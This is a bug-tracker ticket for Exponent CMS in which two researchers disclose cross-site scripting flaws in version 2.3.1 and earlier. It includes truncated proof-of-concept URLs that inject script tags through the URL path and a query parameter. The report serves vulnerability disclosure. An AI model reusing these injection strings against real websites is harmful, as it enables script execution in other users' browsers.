#1230 open
Mayuresh Dani

Universal cross-site scripting in Exponent CMS 2.3.1 and prior

Reported by Mayuresh Dani | November 4th, 2014 @ 02:56 PM | in User issues

Hi,

We found a universal cross-site scripting while testing Exponent CMS versions prior to 2.3.1. It can be verified by visiting -
http://www.exponentcms.org/news/show/title/time-for-a-heavy-harvest...

http://www.exponentcms.org/news/show/title/%22%3E%3Cscript%3Ealert%...

http://www.exponentcms.org/news/%22%3E%3Cscript%3Ealert%287%29%3C/s...

Seems like Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts.

Also, another cross-site scripting vulnerability exists in version 2.3.1 example -
http://localhost/exponent/index.php?int=&src=%22/%3E%3CSCRIPT%3...

Thanks,
Mayuresh Dani (mdani@qualys.com)
Narendra Shinde (nshinde@qualys.com)

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Attachments

Tags

Pages